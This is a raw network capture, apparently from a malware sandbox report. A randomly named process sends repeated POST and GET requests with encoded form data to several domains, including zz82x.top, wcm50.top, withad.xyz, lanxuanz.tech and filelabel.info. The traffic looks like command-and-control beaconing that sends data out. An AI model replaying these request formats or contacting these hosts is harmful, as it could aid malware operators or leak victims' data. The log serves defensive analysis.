                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=5qpOuAz3f4GKPyZ45Buvhpl6f8Qo6tR7RHmE4TeZc3XNjysi/xrZyfRctLx662/BUdc4RUOUBjfWzcbsr1D3JUK7OWpg3Nej0WntP4B+sbZumzsSbcv7cqrKbRJGCXK/MvixPi6lJOF1vknuqy4FUGVsfFd0KBSbYwes2zKKwgDKTbdjChbayXWe3lzSDc+spNBajHhUf4muSbAjl1KuOCjjKKpH
                                                    Sep 11, 2024 15:44:33.005851984 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:32 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    7 | 192.168.2.8 | 49723 | 38.47.232.196 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:34.661335945 CEST | 1638 | OUT | POST /ym8o/ HTTP/1.1
                                                    Host: www.zz82x.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.zz82x.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.zz82x.top/ym8o/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:35.554090977 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:35 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.8 | 49724 | 38.47.232.196 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:37.204586029 CEST | 355 | OUT | GET /ym8o/?7FhphPx8=0oBut1yNYbWGPCBm9TSA9IgiRO1fme9nbBTx5iLcdFvMwA802wT54clasuFI7VrQYq05SkWGMRfigce42UbKA1ftCWwM+Miq0U3WQ7VDlbB/qS47COTgeoabRThRJ1vWYw==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.zz82x.top
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:38.120410919 CEST | 289 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:37 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 146
                                                    Connection: close
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    9 | 192.168.2.8 | 49725 | 154.23.184.60 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:43.574311018 CEST | 601 | OUT | POST /sok0/ HTTP/1.1
                                                    Host: www.wcm50.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.wcm50.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.wcm50.top/sok0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=wlia5rrqown9A3N8K5eyavg5rMFF6xAKjNdZkMKAfINAhHO2izBsxJ/HHyjrWZvByj8zZ5uHtH6kKu2QtomjCQoWffyYI12otzkREQqRhHCgOn2yba3ALHALD9mTK3gAvvMVGXgIdfNT7D+K97Wj9UbDJJHfZNyHo4Wy4BQP6HCWoNElpqXaRD01ir5K627seJmIyWA=
                                                    Sep 11, 2024 15:44:44.463618040 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:44 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66a62026-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    10 | 192.168.2.8 | 49726 | 154.23.184.60 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:46.114449978 CEST | 621 | OUT | POST /sok0/ HTTP/1.1
                                                    Host: www.wcm50.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.wcm50.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.wcm50.top/sok0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=wlia5rrqown9Gm98Ma2yPfg4nsFF1RAOjNZZkJyuf7pAhm+2jxpswJ/HPSjiVpvKyjw7Z8uHtEGkKs+QubOsEQoUGPyaGV2otzkRERa7hDmgJXmya4fHFnAITtmTbngEvvNAGSAmdc1T7DOK9u6k0UbBGpGbZP6OlZac6SUr9nONp7pPzIfcSDceioR8/BmEEq24sBUrPQ8bqS7X7VjaoCKvAZMc
                                                    Sep 11, 2024 15:44:47.025702000 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:46 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66a62026-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    11 | 192.168.2.8 | 49727 | 154.23.184.60 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:48.660743952 CEST | 1638 | OUT | POST /sok0/ HTTP/1.1
                                                    Host: www.wcm50.top
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.wcm50.top
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.wcm50.top/sok0/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:49.785161972 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:49 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66a62026-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.8 | 49728 | 154.23.184.60 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:51.204773903 CEST | 355 | OUT | GET /sok0/?7FhphPx8=9nK66fHSoCGrYX5jHrC3asY4m/NP2zsti9hRjfn4Wr4e/FiQigglveO7AVfjaLvN/0FhSpqF9UPYZOX+oIaHTDoBLOWSI3eQtwYAcESBlg+HOyGBVY7bHW8qFNWLHXF31w==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.wcm50.top
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:44:52.152250051 CEST | 312 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Wed, 11 Sep 2024 13:44:51 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 148
                                                    Connection: close
                                                    ETag: "66a62026-94"
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.8 | 49729 | 162.0.238.43 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:57.231609106 CEST | 604 | OUT | POST /r0nv/ HTTP/1.1
                                                    Host: www.withad.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.withad.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.withad.xyz/r0nv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=BZZMIAToOGkzzXJkGQih5vTmLzFBsUDCMvNwZRLF8GTyyNN6HBlGPs+fKaXG1cpQLR9lHvIJF0mWznn7kkImANTIXw0YKrtdtJWOMFz0Ba1k4zbbHHvovh/jpgTJw3/Z3DQqA1QdZxhsSBsWir1+NLbTAWIaN+gIsJuDQp3QplxX0/vDHO8ez9LVSlsBY/6EcMbJkfo=
                                                    Sep 11, 2024 15:44:57.824476957 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 11 Sep 2024 13:44:57 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.8 | 49730 | 162.0.238.43 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:44:59.775018930 CEST | 624 | OUT | POST /r0nv/ HTTP/1.1
                                                    Host: www.withad.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.withad.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.withad.xyz/r0nv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=BZZMIAToOGkzy0RkEzKh+PThOzFB2kDGMuxwZTma80HyxvV6GDdGIs+fB6WM78pXLRxbHukJFwOWziD7kTclStTOOg0aX7tdtJWOMFnaBa9k5CrbGmv3wR/8ugTJ03+e3DRPA0MnZyZsSFgWl/B/GLaaO2J+EdYFiYnje7HOjUFq1JCpds0Yw9j+SmE3dInsGvL56I/CIui0su58F3V2PHfLcO/H
                                                    Sep 11, 2024 15:45:00.400854111 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 11 Sep 2024 13:45:00 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.8 | 49731 | 162.0.238.43 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:02.320782900 CEST | 1641 | OUT | POST /r0nv/ HTTP/1.1
                                                    Host: www.withad.xyz
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.withad.xyz
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.withad.xyz/r0nv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:02.993464947 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 11 Sep 2024 13:45:02 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    16 | 192.168.2.8 | 49732 | 162.0.238.43 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:04.881326914 CEST | 356 | OUT | GET /r0nv/?7FhphPx8=MbxsL1z6NlMfyEEeEQCuleq/PSZKqmv+EotLfQicwl73p/l3IQxOAMqhPPjuw+t9DkEIHNdwHFeA2SCmiRgkQNTMDGlrdY5Eo5SgN2XzPpFk5ijgPk/X6R3QnhfZ7UWTpg==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.withad.xyz
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:05.507752895 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                    Date: Wed, 11 Sep 2024 13:45:05 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    17 | 192.168.2.8 | 49733 | 136.143.186.12 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:10.875428915 CEST | 613 | OUT | POST /em49/ HTTP/1.1
                                                    Host: www.lanxuanz.tech
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.lanxuanz.tech
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.lanxuanz.tech/em49/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=iXRxfjc6aiFSweF8ZfOtKrVxeSGC5DgTEIhXgOzOPcfSeom6N2GJHVhzjVAgdiLBAOKxULyryFKZj82AIy5s38Wotz/UkVy94MxJtob8qkwW9WpjQ959QBKs+lPo2Oifoq8PjI8G5UYOg4Di5358zvb6iVRemad5UhijgR/SfRVFHrJlQWSD1Ene3QJCnHrwtHDGtIM=
                                                    Sep 11, 2024 15:45:11.474853039 CEST | 1236 | IN | HTTP/1.1 404
                                                    Server: ZGS
                                                    Date: Wed, 11 Sep 2024 13:45:11 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                    Set-Cookie: csrfc=70032b4f-d818-4062-a01e-c73120e2f738;path=/;priority=high
                                                    Set-Cookie: _zcsr_tmp=70032b4f-d818-4062-a01e-c73120e2f738;path=/;SameSite=Strict;priority=high
                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                    vary: accept-encoding
                                                    Content-Encoding: gzip
                                                    Sep 11, 2024 15:45:11.474931955 CEST | 723 | IN


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    18 | 192.168.2.8 | 49734 | 136.143.186.12 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:13.419418097 CEST | 633 | OUT | POST /em49/ HTTP/1.1
                                                    Host: www.lanxuanz.tech
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.lanxuanz.tech
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.lanxuanz.tech/em49/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=iXRxfjc6aiFSiO18VYitILV2RyGC2jgXEItXgMfePpPSdNC6M1eJL1hzo1A5ZiLwAOO5UJ2ryBiZj9GALBRz3sWqlT/WgVy94MxJtprWqkoW6m5jQYN+ORKr7lPoheiToq8XjNVT5WwOg6bi+m5/8vb8v1QioIMNZB+Hizj9cBU/GdkPK0aF2EP13Th0iw2Y3kT2zfZB3PwaQuHnz38rSwMsBEDW
                                                    Sep 11, 2024 15:45:14.022538900 CEST | 1236 | IN | HTTP/1.1 404
                                                    Server: ZGS
                                                    Date: Wed, 11 Sep 2024 13:45:13 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: zalb_8ae64e9492=346483e803ff107bf3906cbcefa288fe; Path=/
                                                    Set-Cookie: csrfc=e373dc2c-2714-4410-a6ed-2169c9674538;path=/;priority=high
                                                    Set-Cookie: _zcsr_tmp=e373dc2c-2714-4410-a6ed-2169c9674538;path=/;SameSite=Strict;priority=high
                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                    vary: accept-encoding
                                                    Content-Encoding: gzip
                                                    Sep 11, 2024 15:45:14.022592068 CEST | 723 | IN


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    19 | 192.168.2.8 | 49735 | 136.143.186.12 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:15.961313009 CEST | 1650 | OUT | POST /em49/ HTTP/1.1
                                                    Host: www.lanxuanz.tech
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.lanxuanz.tech
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Connection: close
                                                    Referer: http://www.lanxuanz.tech/em49/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:16.561054945 CEST | 549 | IN | HTTP/1.1 400
                                                    Server: ZGS
                                                    Date: Wed, 11 Sep 2024 13:45:16 GMT
                                                    Content-Type: text/html;charset=ISO-8859-1
                                                    Content-Length: 80
                                                    Connection: close
                                                    Set-Cookie: zalb_8ae64e9492=dcda410a352560c8665e42e40fadfd79; Path=/
                                                    Set-Cookie: csrfc=642a798d-d7e6-4f3a-a6dc-c48d365b1fb1;path=/;priority=high
                                                    Set-Cookie: _zcsr_tmp=642a798d-d7e6-4f3a-a6dc-c48d365b1fb1;path=/;SameSite=Strict;priority=high
                                                    Set-Cookie: JSESSIONID=91155162A02F0E1CA558A7638AA1F2B1; Path=/; HttpOnly
                                                    Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    20 | 192.168.2.8 | 49736 | 136.143.186.12 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:18.506221056 CEST | 359 | OUT | GET /em49/?7FhphPx8=vV5RcTk6UjJnp8cGdrCla/0gYy6e1BMmF8l1hdm9JL6NOoivCUbMAyYanCg5fgzmDPzjWpeb906PoOnUGjRvxfKMvQWnmHyH5PNq1cjGr2lL9E1sX95rHCmr3UDKreGapg==&dD=3XyH6pjxGLhPK HTTP/1.1
                                                    Host: www.lanxuanz.tech
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Sep 11, 2024 15:45:19.102969885 CEST | 1236 | IN | HTTP/1.1 404
                                                    Server: ZGS
                                                    Date: Wed, 11 Sep 2024 13:45:19 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 4641
                                                    Connection: close
                                                    Set-Cookie: zalb_8ae64e9492=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/
                                                    Set-Cookie: csrfc=c51904c3-1315-4646-9709-94f4449b71c6;path=/;priority=high
                                                    Set-Cookie: _zcsr_tmp=c51904c3-1315-4646-9709-94f4449b71c6;path=/;SameSite=Strict;priority=high
                                                    Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                    vary: accept-encoding
                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                                    Sep 11, 2024 15:45:19.102997065 CEST | 1236 | IN
                                                    Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin
                                                    Sep 11, 2024 15:45:19.103013992 CEST | 1236 | IN
                                                    Data Ascii: h3{ font-size:18px; font-family: "Open Sans"; font-weight:normal; font-weight:600; } .weight400{ font-weight:400; } .domain-color{
                                                    Sep 11, 2024 15:45:19.103034019 CEST | 672 | IN
                                                    Data Ascii: rgba(0, 0, 0, 0.12); color: #ffffff; font-size: 18px; font-weight: 300; padding: 10px 20px; text-decoration: none; position:relative; } </style
                                                    Sep 11, 2024 15:45:19.103050947 CEST | 787 | IN
                                                    Data Ascii: </h3> <h2>Do more with your domain!</h2> <div class="main-info"> <ul> <li>Grow your business online with your website.</li> <li>Building a we


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    21 | 192.168.2.8 | 49737 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:24.147454977 CEST | 616 | OUT | POST /2w7y/ HTTP/1.1
                                                    Host: www.filelabel.info
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.filelabel.info
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Connection: close
                                                    Referer: http://www.filelabel.info/2w7y/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=GYYP3t6RQdKJfMqC+Q/XXt4vh6baTeDGd7HZgYoPp21j9yT5Z3+O7FjLfhcwRjL4G8fnQvS5v0xoPDdtcsoT/D19dCKE7/NOeplO5x7eSdvbwmRsN1lJXz9sNiaHoQ7rbbg59qJzMvx3xmCZ7vsp6QUs3ziox0ufyBPeMKNSLeBoTCIhQatDSNICFLJqP0UoQgTKh9g=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    22 | 192.168.2.8 | 49738 | 3.33.130.190 | 80 | 3260 | C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 11, 2024 15:45:26.701293945 CEST | 636 | OUT | POST /2w7y/ HTTP/1.1
                                                    Host: www.filelabel.info
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-us
                                                    Origin: http://www.filelabel.info
                                                    Cache-Control: max-age=0
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Connection: close
                                                    Referer: http://www.filelabel.info/2w7y/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0
                                                    Data Ascii: 7FhphPx8=GYYP3t6RQdKJFs6C9x/XWN4u46baZ+DCd7LZgcxEpFBj6Tj5YzSOyVjLUBc1fDLzG8TeQve5v0VoPBFtcfAS5T17XSKK2fNOeplO5xv0Sd3bxWhsNUlOJj9raSaHsQ7vbbhc9o8kMtJ3xiOZ1bx/xQUqqjjN82vt3RbNBbI1BcMVfUlLK4lFRNgpFIhcKDJAKDD6/q0mvyabAdEJEdW646QBLwP6


